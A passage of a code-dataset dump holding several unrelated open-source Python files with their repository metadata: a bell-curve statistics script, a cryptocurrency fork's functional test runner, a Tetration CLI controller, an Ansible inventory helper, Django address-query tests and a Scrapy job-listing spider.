] | 2 | 2021-09-28T13:55:20.000Z | 2021-11-15T10:08:49.000Z | 013-C109-BellCurve-2/__main__.py | somePythonProgrammer/PythonCode | fb2b2245db631cefd916a960768f411969b0e78f | [
"MIT"
] | null | null | null | 013-C109-BellCurve-2/__main__.py | somePythonProgrammer/PythonCode | fb2b2245db631cefd916a960768f411969b0e78f | [
"MIT"
] | 1 | 2022-01-20T03:02:20.000Z | 2022-01-20T03:02:20.000Z | # 013-C109-BellCurve-2
# This is a python script made by @somePythonProgrammer
# for a WhiteHat Junior project.
import pandas as pd
import plotly.figure_factory as ff
import statistics
df = pd.read_csv('013-C109-BellCurve-2/csv/students.csv')
scores = df['math score'].tolist()
mean_ = statistics.mean(scores)
median_ = statistics.median(scores)
mode_ = statistics.mode(scores)
stdev_ = statistics.stdev(scores)
print(f'Mean: {mean_}')
print(f'Median: {median_}')
print(f'Mode: {mode_}')
print(f'Standard Deviation: {stdev_}')
# get the percentage of scores within 1 standard deviation of the mean
count = 0
for score in scores:
if score > mean_ - stdev_ and score < mean_ + stdev_:
count += 1
_1perc = (count / len(scores))*100
print('1st Standard Deviation:', _1perc, '%')
# get the percentage of scores within 2 standard deviations of the mean
count = 0
for score in scores:
if score > mean_ - (stdev_ * 2) and score < mean_ + (stdev_ * 2):
count += 1
_2perc = (count / len(scores))*100
print('2nd Standard Deviation:', _2perc, '%')
# get the percentage of scores within 3 standard deviations of the mean
count = 0
for score in scores:
if score > mean_ - (stdev_ * 3) and score < mean_ + (stdev_ * 3):
count += 1
_3perc = (count / len(scores))*100
print('3rd Standard Deviation:', _3perc, '%')
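# For roughly normally distributed scores these three percentages should land close to
# the 68-95-99.7 rule: ~68% within 1 SD of the mean, ~95% within 2 SD, ~99.7% within 3 SD.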
figure = ff.create_distplot([scores], ['Math Scores'])
figure.write_html('013-C109-BellCurve-2/index.html', auto_open=True)
| 29.479167 | 69 | 0.69894 |
6e19e9d0688799f4278e23abcec0825f6d24d98e | 25,319 | py | Python | test/functional/test_runner.py | percussionpc/grovcoina | 900c37d969a8876a66e87e6d94e9c1ec9e847bfe | [
"MIT"
] | null | null | null | test/functional/test_runner.py | percussionpc/grovcoina | 900c37d969a8876a66e87e6d94e9c1ec9e847bfe | [
"MIT"
] | null | null | null | test/functional/test_runner.py | percussionpc/grovcoina | 900c37d969a8876a66e87e6d94e9c1ec9e847bfe | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2014-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Run regression test suite.
This module calls down into individual test cases via subprocess. It will
forward all unrecognized arguments onto the individual test scripts.
For a description of arguments recognized by test scripts, see
`test/functional/test_framework/test_framework.py:BitcoinTestFramework.main`.
"""
import argparse
from collections import deque
import configparser
import datetime
import os
import time
import shutil
import signal
import sys
import subprocess
import tempfile
import re
import logging
# Formatting. Default colors to empty strings.
BOLD, GREEN, RED, GREY = ("", ""), ("", ""), ("", ""), ("", "")
try:
# Make sure python thinks it can write unicode to its stdout
"\u2713".encode("utf_8").decode(sys.stdout.encoding)
TICK = "✓ "
CROSS = "✖ "
CIRCLE = "○ "
except UnicodeDecodeError:
TICK = "P "
CROSS = "x "
CIRCLE = "o "
if os.name != 'nt' or sys.getwindowsversion() >= (10, 0, 14393):
if os.name == 'nt':
import ctypes
kernel32 = ctypes.windll.kernel32
ENABLE_VIRTUAL_TERMINAL_PROCESSING = 4
STD_OUTPUT_HANDLE = -11
STD_ERROR_HANDLE = -12
# Enable ascii color control to stdout
stdout = kernel32.GetStdHandle(STD_OUTPUT_HANDLE)
stdout_mode = ctypes.c_int32()
kernel32.GetConsoleMode(stdout, ctypes.byref(stdout_mode))
kernel32.SetConsoleMode(stdout, stdout_mode.value | ENABLE_VIRTUAL_TERMINAL_PROCESSING)
# Enable ascii color control to stderr
stderr = kernel32.GetStdHandle(STD_ERROR_HANDLE)
stderr_mode = ctypes.c_int32()
kernel32.GetConsoleMode(stderr, ctypes.byref(stderr_mode))
kernel32.SetConsoleMode(stderr, stderr_mode.value | ENABLE_VIRTUAL_TERMINAL_PROCESSING)
# primitive formatting on supported
# terminal via ANSI escape sequences:
BOLD = ('\033[0m', '\033[1m')
GREEN = ('\033[0m', '\033[0;32m')
RED = ('\033[0m', '\033[0;31m')
GREY = ('\033[0m', '\033[1;30m')
TEST_EXIT_PASSED = 0
TEST_EXIT_SKIPPED = 77
BASE_SCRIPTS = [
# Scripts that are run by the travis build process.
# Longest test should go first, to favor running tests in parallel
'feature_fee_estimation.py',
'wallet_hd.py',
'wallet_backup.py',
# vv Tests less than 5m vv
'mining_getblocktemplate_longpoll.py',
'feature_maxuploadtarget.py',
'feature_block.py',
'rpc_fundrawtransaction.py',
'p2p_compactblocks.py',
'feature_segwit.py',
# vv Tests less than 2m vv
'wallet_basic.py',
'wallet_labels.py',
'p2p_segwit.py',
'p2p_timeouts.py',
'wallet_dump.py',
'wallet_listtransactions.py',
# vv Tests less than 60s vv
'p2p_sendheaders.py',
'wallet_zapwallettxes.py',
'wallet_importmulti.py',
'mempool_limit.py',
'rpc_txoutproof.py',
'wallet_listreceivedby.py',
'wallet_abandonconflict.py',
'feature_csv_activation.py',
'rpc_rawtransaction.py',
'wallet_address_types.py',
'feature_bip68_sequence.py',
'p2p_feefilter.py',
'feature_reindex.py',
# vv Tests less than 30s vv
'wallet_keypool_topup.py',
'interface_zmq.py',
'interface_bitcoin_cli.py',
'mempool_resurrect.py',
'wallet_txn_doublespend.py --mineblock',
'tool_wallet.py',
'wallet_txn_clone.py',
'wallet_txn_clone.py --segwit',
'rpc_getchaintips.py',
'rpc_misc.py',
'interface_rest.py',
'mempool_spend_coinbase.py',
'mempool_reorg.py',
'mempool_persist.py',
'wallet_multiwallet.py',
'wallet_multiwallet.py --usecli',
'wallet_createwallet.py',
'wallet_createwallet.py --usecli',
'interface_http.py',
'interface_rpc.py',
'rpc_psbt.py',
'rpc_users.py',
'feature_proxy.py',
'rpc_signrawtransaction.py',
'wallet_groups.py',
'p2p_disconnect_ban.py',
'rpc_decodescript.py',
'rpc_blockchain.py',
'rpc_deprecated.py',
'wallet_disable.py',
'rpc_net.py',
'wallet_keypool.py',
'p2p_mempool.py',
'p2p_blocksonly.py',
'mining_prioritisetransaction.py',
'p2p_invalid_locator.py',
'p2p_invalid_block.py',
'p2p_invalid_messages.py',
'p2p_invalid_tx.py',
'feature_assumevalid.py',
'example_test.py',
'wallet_txn_doublespend.py',
'wallet_txn_clone.py --mineblock',
'feature_notifications.py',
'rpc_invalidateblock.py',
'feature_rbf.py',
'mempool_packages.py',
'rpc_createmultisig.py',
'feature_versionbits_warning.py',
'rpc_preciousblock.py',
'wallet_importprunedfunds.py',
'p2p_leak_tx.py',
'rpc_signmessage.py',
'wallet_balance.py',
'feature_nulldummy.py',
'mempool_accept.py',
'wallet_import_rescan.py',
'wallet_import_with_label.py',
'rpc_bind.py --ipv4',
'rpc_bind.py --ipv6',
'rpc_bind.py --nonloopback',
'mining_basic.py',
'wallet_bumpfee.py',
'rpc_named_arguments.py',
'wallet_listsinceblock.py',
'p2p_leak.py',
'wallet_encryption.py',
'wallet_scriptaddress2.py',
'feature_dersig.py',
'feature_cltv.py',
'rpc_uptime.py',
'wallet_resendwallettransactions.py',
'wallet_fallbackfee.py',
'feature_minchainwork.py',
'rpc_getblockstats.py',
'wallet_create_tx.py',
'p2p_fingerprint.py',
'feature_uacomment.py',
'wallet_coinbase_category.py',
'feature_filelock.py',
'p2p_unrequested_blocks.py',
'feature_includeconf.py',
'rpc_deriveaddresses.py',
'rpc_deriveaddresses.py --usecli',
'rpc_scantxoutset.py',
'feature_logging.py',
'p2p_node_network_limited.py',
'feature_blocksdir.py',
'feature_config_args.py',
'rpc_help.py',
'feature_help.py',
'feature_shutdown.py',
# Don't append tests at the end to avoid merge conflicts
# Put them in a random line within the section that fits their approximate run-time
]
EXTENDED_SCRIPTS = [
# These tests are not run by the travis build process.
# Longest test should go first, to favor running tests in parallel
'feature_pruning.py',
'feature_dbcrash.py',
]
# Place EXTENDED_SCRIPTS first since it has the 3 longest running tests
ALL_SCRIPTS = EXTENDED_SCRIPTS + BASE_SCRIPTS
NON_SCRIPTS = [
# These are python files that live in the functional tests directory, but are not test scripts.
"combine_logs.py",
"create_cache.py",
"test_runner.py",
]
def main():
# Parse arguments and pass through unrecognised args
parser = argparse.ArgumentParser(add_help=False,
usage='%(prog)s [test_runner.py options] [script options] [scripts]',
description=__doc__,
epilog='''
Help text and arguments for individual test script:''',
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('--combinedlogslen', '-c', type=int, default=0, metavar='n', help='On failure, print a log (of length n lines) to the console, combined from the test framework and all test nodes.')
parser.add_argument('--coverage', action='store_true', help='generate a basic coverage report for the RPC interface')
parser.add_argument('--ci', action='store_true', help='Run checks and code that are usually only enabled in a continuous integration environment')
parser.add_argument('--exclude', '-x', help='specify a comma-separated-list of scripts to exclude.')
parser.add_argument('--extended', action='store_true', help='run the extended test suite in addition to the basic tests')
parser.add_argument('--help', '-h', '-?', action='store_true', help='print help text and exit')
parser.add_argument('--jobs', '-j', type=int, default=4, help='how many test scripts to run in parallel. Default=4.')
parser.add_argument('--keepcache', '-k', action='store_true', help='the default behavior is to flush the cache directory on startup. --keepcache retains the cache from the previous testrun.')
parser.add_argument('--quiet', '-q', action='store_true', help='only print dots, results summary and failure logs')
parser.add_argument('--tmpdirprefix', '-t', default=tempfile.gettempdir(), help="Root directory for datadirs")
parser.add_argument('--failfast', action='store_true', help='stop execution after the first test failure')
args, unknown_args = parser.parse_known_args()
# args to be passed on always start with two dashes; tests are the remaining unknown args
tests = [arg for arg in unknown_args if arg[:2] != "--"]
passon_args = [arg for arg in unknown_args if arg[:2] == "--"]
# Read config generated by configure.
config = configparser.ConfigParser()
configfile = os.path.abspath(os.path.dirname(__file__)) + "/../config.ini"
config.read_file(open(configfile, encoding="utf8"))
passon_args.append("--configfile=%s" % configfile)
# Set up logging
logging_level = logging.INFO if args.quiet else logging.DEBUG
logging.basicConfig(format='%(message)s', level=logging_level)
# Create base test directory
tmpdir = "%s/test_runner_Ł_🏃_%s" % (args.tmpdirprefix, datetime.datetime.now().strftime("%Y%m%d_%H%M%S"))
os.makedirs(tmpdir)
logging.debug("Temporary test directory at %s" % tmpdir)
enable_bitcoind = config["components"].getboolean("ENABLE_BITCOIND")
if not enable_bitcoind:
print("No functional tests to run.")
print("Rerun ./configure with --with-daemon and then make")
sys.exit(0)
# Build list of tests
test_list = []
if tests:
# Individual tests have been specified. Run specified tests that exist
# in the ALL_SCRIPTS list. Accept the name with or without .py extension.
tests = [test + ".py" if ".py" not in test else test for test in tests]
for test in tests:
if test in ALL_SCRIPTS:
test_list.append(test)
else:
print("{}WARNING!{} Test '{}' not found in full test list.".format(BOLD[1], BOLD[0], test))
elif args.extended:
# Include extended tests
test_list += ALL_SCRIPTS
else:
# Run base tests only
test_list += BASE_SCRIPTS
# Remove the test cases that the user has explicitly asked to exclude.
if args.exclude:
exclude_tests = [test.split('.py')[0] for test in args.exclude.split(',')]
for exclude_test in exclude_tests:
# Remove <test_name>.py and <test_name>.py --arg from the test list
exclude_list = [test for test in test_list if test.split('.py')[0] == exclude_test]
for exclude_item in exclude_list:
test_list.remove(exclude_item)
if not exclude_list:
print("{}WARNING!{} Test '{}' not found in current test list.".format(BOLD[1], BOLD[0], exclude_test))
if not test_list:
print("No valid test scripts specified. Check that your test is in one "
"of the test lists in test_runner.py, or run test_runner.py with no arguments to run all tests")
sys.exit(0)
if args.help:
# Print help for test_runner.py, then print help of the first script (with args removed) and exit.
parser.print_help()
subprocess.check_call([sys.executable, os.path.join(config["environment"]["SRCDIR"], 'test', 'functional', test_list[0].split()[0]), '-h'])
sys.exit(0)
check_script_list(src_dir=config["environment"]["SRCDIR"], fail_on_warn=args.ci)
check_script_prefixes()
if not args.keepcache:
shutil.rmtree("%s/test/cache" % config["environment"]["BUILDDIR"], ignore_errors=True)
run_tests(
test_list=test_list,
src_dir=config["environment"]["SRCDIR"],
build_dir=config["environment"]["BUILDDIR"],
tmpdir=tmpdir,
jobs=args.jobs,
enable_coverage=args.coverage,
args=passon_args,
combined_logs_len=args.combinedlogslen,
failfast=args.failfast,
runs_ci=args.ci,
)
def run_tests(*, test_list, src_dir, build_dir, tmpdir, jobs=1, enable_coverage=False, args=None, combined_logs_len=0, failfast=False, runs_ci):
args = args or []
    # Warn if grovcoind is already running (unix only)
try:
if subprocess.check_output(["pidof", "grovcoind"]) is not None:
print("%sWARNING!%s There is already a grovcoind process running on this system. Tests may fail unexpectedly due to resource contention!" % (BOLD[1], BOLD[0]))
except (OSError, subprocess.SubprocessError):
pass
# Warn if there is a cache directory
cache_dir = "%s/test/cache" % build_dir
if os.path.isdir(cache_dir):
print("%sWARNING!%s There is a cache directory here: %s. If tests fail unexpectedly, try deleting the cache directory." % (BOLD[1], BOLD[0], cache_dir))
tests_dir = src_dir + '/test/functional/'
flags = ['--cachedir={}'.format(cache_dir)] + args
if enable_coverage:
coverage = RPCCoverage()
flags.append(coverage.flag)
logging.debug("Initializing coverage directory at %s" % coverage.dir)
else:
coverage = None
if len(test_list) > 1 and jobs > 1:
# Populate cache
try:
subprocess.check_output([sys.executable, tests_dir + 'create_cache.py'] + flags + ["--tmpdir=%s/cache" % tmpdir])
except subprocess.CalledProcessError as e:
sys.stdout.buffer.write(e.output)
raise
#Run Tests
job_queue = TestHandler(
num_tests_parallel=jobs,
tests_dir=tests_dir,
tmpdir=tmpdir,
test_list=test_list,
flags=flags,
timeout_duration=40 * 60 if runs_ci else float('inf'), # in seconds
)
start_time = time.time()
test_results = []
max_len_name = len(max(test_list, key=len))
test_count = len(test_list)
for i in range(test_count):
test_result, testdir, stdout, stderr = job_queue.get_next()
test_results.append(test_result)
done_str = "{}/{} - {}{}{}".format(i + 1, test_count, BOLD[1], test_result.name, BOLD[0])
if test_result.status == "Passed":
logging.debug("%s passed, Duration: %s s" % (done_str, test_result.time))
elif test_result.status == "Skipped":
logging.debug("%s skipped" % (done_str))
else:
print("%s failed, Duration: %s s\n" % (done_str, test_result.time))
print(BOLD[1] + 'stdout:\n' + BOLD[0] + stdout + '\n')
print(BOLD[1] + 'stderr:\n' + BOLD[0] + stderr + '\n')
if combined_logs_len and os.path.isdir(testdir):
# Print the final `combinedlogslen` lines of the combined logs
print('{}Combine the logs and print the last {} lines ...{}'.format(BOLD[1], combined_logs_len, BOLD[0]))
print('\n============')
print('{}Combined log for {}:{}'.format(BOLD[1], testdir, BOLD[0]))
print('============\n')
combined_logs_args = [sys.executable, os.path.join(tests_dir, 'combine_logs.py'), testdir]
if BOLD[0]:
combined_logs_args += ['--color']
combined_logs, _ = subprocess.Popen(combined_logs_args, universal_newlines=True, stdout=subprocess.PIPE).communicate()
print("\n".join(deque(combined_logs.splitlines(), combined_logs_len)))
if failfast:
logging.debug("Early exiting after test failure")
break
print_results(test_results, max_len_name, (int(time.time() - start_time)))
if coverage:
coverage.report_rpc_coverage()
logging.debug("Cleaning up coverage data")
coverage.cleanup()
# Clear up the temp directory if all subdirectories are gone
if not os.listdir(tmpdir):
os.rmdir(tmpdir)
all_passed = all(map(lambda test_result: test_result.was_successful, test_results))
# This will be a no-op unless failfast is True in which case there may be dangling
# processes which need to be killed.
job_queue.kill_and_join()
sys.exit(not all_passed)
def print_results(test_results, max_len_name, runtime):
results = "\n" + BOLD[1] + "%s | %s | %s\n\n" % ("TEST".ljust(max_len_name), "STATUS ", "DURATION") + BOLD[0]
test_results.sort(key=TestResult.sort_key)
all_passed = True
time_sum = 0
for test_result in test_results:
all_passed = all_passed and test_result.was_successful
time_sum += test_result.time
test_result.padding = max_len_name
results += str(test_result)
status = TICK + "Passed" if all_passed else CROSS + "Failed"
if not all_passed:
results += RED[1]
results += BOLD[1] + "\n%s | %s | %s s (accumulated) \n" % ("ALL".ljust(max_len_name), status.ljust(9), time_sum) + BOLD[0]
if not all_passed:
results += RED[0]
results += "Runtime: %s s\n" % (runtime)
print(results)
class TestHandler:
"""
Trigger the test scripts passed in via the list.
"""
def __init__(self, *, num_tests_parallel, tests_dir, tmpdir, test_list, flags, timeout_duration):
assert num_tests_parallel >= 1
self.num_jobs = num_tests_parallel
self.tests_dir = tests_dir
self.tmpdir = tmpdir
self.timeout_duration = timeout_duration
self.test_list = test_list
self.flags = flags
self.num_running = 0
self.jobs = []
def get_next(self):
while self.num_running < self.num_jobs and self.test_list:
# Add tests
self.num_running += 1
test = self.test_list.pop(0)
portseed = len(self.test_list)
portseed_arg = ["--portseed={}".format(portseed)]
log_stdout = tempfile.SpooledTemporaryFile(max_size=2**16)
log_stderr = tempfile.SpooledTemporaryFile(max_size=2**16)
test_argv = test.split()
testdir = "{}/{}_{}".format(self.tmpdir, re.sub(".py$", "", test_argv[0]), portseed)
tmpdir_arg = ["--tmpdir={}".format(testdir)]
self.jobs.append((test,
time.time(),
subprocess.Popen([sys.executable, self.tests_dir + test_argv[0]] + test_argv[1:] + self.flags + portseed_arg + tmpdir_arg,
universal_newlines=True,
stdout=log_stdout,
stderr=log_stderr),
testdir,
log_stdout,
log_stderr))
if not self.jobs:
raise IndexError('pop from empty list')
dot_count = 0
while True:
# Return first proc that finishes
time.sleep(.5)
for job in self.jobs:
(name, start_time, proc, testdir, log_out, log_err) = job
if int(time.time() - start_time) > self.timeout_duration:
# In travis, timeout individual tests (to stop tests hanging and not providing useful output).
proc.send_signal(signal.SIGINT)
if proc.poll() is not None:
log_out.seek(0), log_err.seek(0)
[stdout, stderr] = [log_file.read().decode('utf-8') for log_file in (log_out, log_err)]
log_out.close(), log_err.close()
if proc.returncode == TEST_EXIT_PASSED and stderr == "":
status = "Passed"
elif proc.returncode == TEST_EXIT_SKIPPED:
status = "Skipped"
else:
status = "Failed"
self.num_running -= 1
self.jobs.remove(job)
clearline = '\r' + (' ' * dot_count) + '\r'
print(clearline, end='', flush=True)
dot_count = 0
return TestResult(name, status, int(time.time() - start_time)), testdir, stdout, stderr
print('.', end='', flush=True)
dot_count += 1
def kill_and_join(self):
"""Send SIGKILL to all jobs and block until all have ended."""
procs = [i[2] for i in self.jobs]
for proc in procs:
proc.kill()
for proc in procs:
proc.wait()
class TestResult():
def __init__(self, name, status, time):
self.name = name
self.status = status
self.time = time
self.padding = 0
def sort_key(self):
if self.status == "Passed":
return 0, self.name.lower()
elif self.status == "Failed":
return 2, self.name.lower()
elif self.status == "Skipped":
return 1, self.name.lower()
def __repr__(self):
if self.status == "Passed":
color = GREEN
glyph = TICK
elif self.status == "Failed":
color = RED
glyph = CROSS
elif self.status == "Skipped":
color = GREY
glyph = CIRCLE
return color[1] + "%s | %s%s | %s s\n" % (self.name.ljust(self.padding), glyph, self.status.ljust(7), self.time) + color[0]
@property
def was_successful(self):
return self.status != "Failed"
def check_script_prefixes():
"""Check that test scripts start with one of the allowed name prefixes."""
good_prefixes_re = re.compile("(example|feature|interface|mempool|mining|p2p|rpc|wallet|tool)_")
bad_script_names = [script for script in ALL_SCRIPTS if good_prefixes_re.match(script) is None]
if bad_script_names:
print("%sERROR:%s %d tests not meeting naming conventions:" % (BOLD[1], BOLD[0], len(bad_script_names)))
print(" %s" % ("\n ".join(sorted(bad_script_names))))
raise AssertionError("Some tests are not following naming convention!")
def check_script_list(*, src_dir, fail_on_warn):
"""Check scripts directory.
Check that there are no scripts in the functional tests directory which are
not being run by pull-tester.py."""
script_dir = src_dir + '/test/functional/'
python_files = set([test_file for test_file in os.listdir(script_dir) if test_file.endswith(".py")])
missed_tests = list(python_files - set(map(lambda x: x.split()[0], ALL_SCRIPTS + NON_SCRIPTS)))
if len(missed_tests) != 0:
print("%sWARNING!%s The following scripts are not being run: %s. Check the test lists in test_runner.py." % (BOLD[1], BOLD[0], str(missed_tests)))
if fail_on_warn:
# On travis this warning is an error to prevent merging incomplete commits into master
sys.exit(1)
class RPCCoverage():
"""
Coverage reporting utilities for test_runner.
Coverage calculation works by having each test script subprocess write
coverage files into a particular directory. These files contain the RPC
commands invoked during testing, as well as a complete listing of RPC
commands per `grovcoin-cli help` (`rpc_interface.txt`).
After all tests complete, the commands run are combined and diff'd against
the complete list to calculate uncovered RPC commands.
See also: test/functional/test_framework/coverage.py
"""
def __init__(self):
self.dir = tempfile.mkdtemp(prefix="coverage")
self.flag = '--coveragedir=%s' % self.dir
def report_rpc_coverage(self):
"""
Print out RPC commands that were unexercised by tests.
"""
uncovered = self._get_uncovered_rpc_commands()
if uncovered:
print("Uncovered RPC commands:")
print("".join((" - %s\n" % command) for command in sorted(uncovered)))
else:
print("All RPC commands covered.")
def cleanup(self):
return shutil.rmtree(self.dir)
def _get_uncovered_rpc_commands(self):
"""
Return a set of currently untested RPC commands.
"""
# This is shared from `test/functional/test-framework/coverage.py`
reference_filename = 'rpc_interface.txt'
coverage_file_prefix = 'coverage.'
coverage_ref_filename = os.path.join(self.dir, reference_filename)
coverage_filenames = set()
all_cmds = set()
covered_cmds = set()
if not os.path.isfile(coverage_ref_filename):
raise RuntimeError("No coverage reference found")
with open(coverage_ref_filename, 'r', encoding="utf8") as coverage_ref_file:
all_cmds.update([line.strip() for line in coverage_ref_file.readlines()])
for root, _, files in os.walk(self.dir):
for filename in files:
if filename.startswith(coverage_file_prefix):
coverage_filenames.add(os.path.join(root, filename))
for filename in coverage_filenames:
with open(filename, 'r', encoding="utf8") as coverage_file:
covered_cmds.update([line.strip() for line in coverage_file.readlines()])
return all_cmds - covered_cmds
if __name__ == '__main__':
main()
| 38.892473 | 205 | 0.632331 |
0ecd8c994118cadaf94a9df739e370cc033a4278 | 1,124 | py | Python | tetrationcli/controllers/applications.py | jumolinas/tetrationcli | 41605403734ab1e2256b01f438bf9172288fa912 | [
"MIT"
] | 4 | 2018-11-28T13:37:59.000Z | 2019-03-29T03:02:27.000Z | tetrationcli/controllers/applications.py | jumolinas/tetrationcli | 41605403734ab1e2256b01f438bf9172288fa912 | [
"MIT"
] | 5 | 2018-12-07T13:06:35.000Z | 2019-12-13T15:32:51.000Z | tetrationcli/controllers/applications.py | jumolinas/tetrationcli | 41605403734ab1e2256b01f438bf9172288fa912 | [
"MIT"
] | null | null | null | from cement import ex
from .tet_controller import TetController
import json
class Applications(TetController):
class Meta:
label = 'applications'
stacked_type = 'nested'
help= 'Interact with ADM Application from Tetration Cluster'
@ex(help='list applications', arguments=[
])
def list(self):
"""
Return the list of all the applications
"""
response = self.tetration().get('/applications')
content = json.loads(response.content.decode("utf-8"))
self.app.log.debug('{0} - {1}'.format(response.status_code,
response.content.decode('utf-8')))
if response.status_code == 403:
self.app.log.error('{0}Request "app_policy_management" permissions'.format(response.content.decode('utf-8')))
return
headers = ['Application ID', 'Name', 'Scope ID']
data_list = [[x['id'],
x['name'],
x['app_scope_id']] for x in content ]
self.app.render(data_list, headers=headers)
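# Typical CLI usage (entry-point name assumed from the package; the cement labels above
# give the sub-command):
#   tetrationcli applications list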
| 33.058824 | 121 | 0.564057 |
b108f4c8311348698a4b16524190d4e54ef654d2 | 2,572 | py | Python | extra/up_inv.py | HeyLazySunnyKid/HeyCheckYourRights | acecff3a41049bc85a88a2d55664afe44e1b4757 | [
"MIT"
] | null | null | null | extra/up_inv.py | HeyLazySunnyKid/HeyCheckYourRights | acecff3a41049bc85a88a2d55664afe44e1b4757 | [
"MIT"
] | null | null | null | extra/up_inv.py | HeyLazySunnyKid/HeyCheckYourRights | acecff3a41049bc85a88a2d55664afe44e1b4757 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import sys
import re
import shutil
import os
"""
Helper script for moving a host from one inventory group to another while
sorting hosts by reachability.
Input: up_inv.py <inventory> <hostname> <ping> <setup> <sudo>
<inventory> - path to inventory file
<hostname> - checked hostname
<ping> - ping is ok (boolean)
<setup> - ansible setup is ok? (boolean)
<sudo> - ansible become is ok? (boolean)
"""
def move_host(inv, host, block):
mode = 'r' if os.path.exists(inv) else 'w+'
with open(inv, mode) as r:
with open('tempfile', 'w') as w:
cur_block = None
host_not_found = True
host_writed = False
file_changed = False
for line in r:
block_match = re.match(r'\[(.*)\]', line)
if block_match:
                    # If we have walked all the way through the target block without
                    # finding the host, append it at the end of that block
if cur_block == block and host_not_found:
w.write(host+'\n')
host_writed = True
file_changed = True
cur_block = block_match.group(1)
w.write(line)
continue
host_match = re.match(host, line)
if host_match:
if cur_block == block:
host_not_found = False
host_writed = True
elif cur_block in ['unreachable', 'ping', 'reachable', 'best']:
                        # Skip the host line: it currently sits in one of the reserved
                        # blocks other than the target one, so it must not be copied over
file_changed = True
continue
w.write(line)
if not host_writed:
                # If we went through the whole file without writing the host, add it here
                # (creating the block header first if the block was never present)
if cur_block != block:
w.write('['+block+']\n')
w.write(host+'\n')
host_writed = True
file_changed = True
shutil.move('tempfile', inv)
if file_changed:
print('changed')
def main():
# print(sys.argv)
inv = sys.argv[1]
host = sys.argv[2]
false_list = ['False', 'false', 'f']
if sys.argv[3] in false_list:
block = 'unreachable'
elif sys.argv[4] in false_list:
block = 'ping'
elif sys.argv[5] in false_list:
block = 'reachable'
else:
block = 'best'
move_host(inv, host, block)
if __name__ == "__main__":
main()
| 27.655914 | 83 | 0.512442 |
597f68e74e0d296d5114aab7ec07e3239539f6ea | 2,609 | py | Python | djaludir/core/tests/sql/test_address.py | carthagecollege/django-djaludir | 126735000efb69d7184aec9591a96667070f1870 | [
"BSD-3-Clause"
] | null | null | null | djaludir/core/tests/sql/test_address.py | carthagecollege/django-djaludir | 126735000efb69d7184aec9591a96667070f1870 | [
"BSD-3-Clause"
] | 2 | 2020-06-05T19:30:19.000Z | 2021-06-10T20:54:38.000Z | djaludir/core/tests/sql/test_address.py | carthagecollege/django-djaludir | 126735000efb69d7184aec9591a96667070f1870 | [
"BSD-3-Clause"
] | null | null | null | from django.conf import settings
from django.test import TestCase
from djaludir.core.sql import HOMEADDRESS_TEMP, WORKADDRESS_TEMP
from djtools.utils.logging import seperator
from djzbar.utils.informix import do_sql
class ManagerAddressTestCase(TestCase):
def setUp(self):
self.debug = settings.INFORMIX_DEBUG
self.earl = settings.INFORMIX_EARL
self.cid = settings.TEST_USER_COLLEGE_ID
self.cid_null = 666
def test_home_address_temp(self):
print("\n")
print("test home address select statement from temp table")
print(seperator())
sql = HOMEADDRESS_TEMP(cid = self.cid)
if settings.DEBUG:
print(sql)
else:
print("use the --debug-mode flag to print HOMEADDRESS_TEMP SQL")
homeaddress = do_sql(sql, self.debug, self.earl).fetchall()
print(homeaddress)
self.assertGreaterEqual(len(homeaddress), 1)
def test_home_address_invalid(self):
print("\n")
print(
"""
test home address select statement from temp table
with invalid college ID
"""
)
print(seperator())
sql = HOMEADDRESS_TEMP(cid = self.cid_null)
if settings.DEBUG:
print(sql)
else:
print("use the --debug-mode flag to print HOMEADDRESS_TEMP SQL")
homeaddress = do_sql(sql, self.debug, self.earl).fetchall()
print(homeaddress)
self.assertEqual(len(homeaddress), 0)
def test_work_address_temp(self):
print("\n")
print("test work address select statement from temp table")
print(seperator())
sql = WORKADDRESS_TEMP(cid = self.cid)
if settings.DEBUG:
print(sql)
else:
print("use the --debug-mode flag to print WORKADDRESS_TEMP SQL")
workaddress = do_sql(sql, self.debug, self.earl).fetchall()
print(workaddress)
self.assertGreaterEqual(len(workaddress), 1)
def test_work_address_invalid(self):
print("\n")
print(
"""
test work address select statement from temp table
with invalid college ID
"""
)
print(seperator())
sql = WORKADDRESS_TEMP(cid = self.cid_null)
if settings.DEBUG:
print(sql)
else:
print("use the --debug-mode flag to print WORKADDRESS_TEMP SQL")
workaddress = do_sql(sql, self.debug, self.earl).fetchall()
print(workaddress)
self.assertEqual(len(workaddress), 0)
| 25.330097 | 76 | 0.609046 |
d2a2c81039574c4e8e166844aeb70fb9e2797f9c | 1,506 | py | Python | TechLurker/scripts/my_scraper/my_scraper/spiders/pyjob_detail_spider.py | han8909227/python_mid_project | 6319f694de070860f814d0b9dfc04afe060134fb | [
"MIT"
] | null | null | null | TechLurker/scripts/my_scraper/my_scraper/spiders/pyjob_detail_spider.py | han8909227/python_mid_project | 6319f694de070860f814d0b9dfc04afe060134fb | [
"MIT"
] | 3 | 2019-12-26T16:39:11.000Z | 2021-03-31T18:40:46.000Z | TechLurker/scripts/my_scraper/my_scraper/spiders/pyjob_detail_spider.py | han8909227/python_mid_project | 6319f694de070860f814d0b9dfc04afe060134fb | [
"MIT"
] | 2 | 2017-11-17T01:19:38.000Z | 2018-09-06T18:43:40.000Z | import scrapy
from scrapy import Request
from TechLurker.scripts.my_scraper.my_scraper.items import RecruitItem
class PyjobSpider_detail(scrapy.Spider):
name = "pyjobd"
allowed_domains = ["python.org"]
start_urls = ["https://www.python.org/jobs/"]
def parse(self, response):
jobs = response.xpath('//ol/li')
for job in jobs:
relative_url = job.xpath('h2/span/a/@href').extract_first()
absolute_url = response.urljoin(relative_url)
title = job.xpath('h2/span/a/text()').extract()[0]
address = job.xpath('h2/span/a/text()').extract()[1]
job_type = job.xpath('span/a/text()').extract()
# company = job.xpath('h2/span/text()').extract()
yield Request(absolute_url, callback=self.parse_page, meta={'URL': absolute_url, 'Title': title, 'Loc': address, 'JobType': job_type})
relative_next_url = response.xpath('//a[contains(@href, "?page=")]/@href')[-1].extract()
absolute_next_url = "https://www.python.org/jobs/" + relative_next_url
yield Request(absolute_next_url, callback=self.parse)
def parse_page(self, response):
item = RecruitItem()
item['url'] = response.meta.get('URL')
item['title'] = response.meta.get('Title')
item['loc'] = response.meta.get('Loc')
item['job_type'] = response.meta.get('JobType')
item['descrip'] = response.xpath('//div[@class="job-description"]/p/text()').extract()
yield item
| 45.636364 | 146 | 0.626826 |
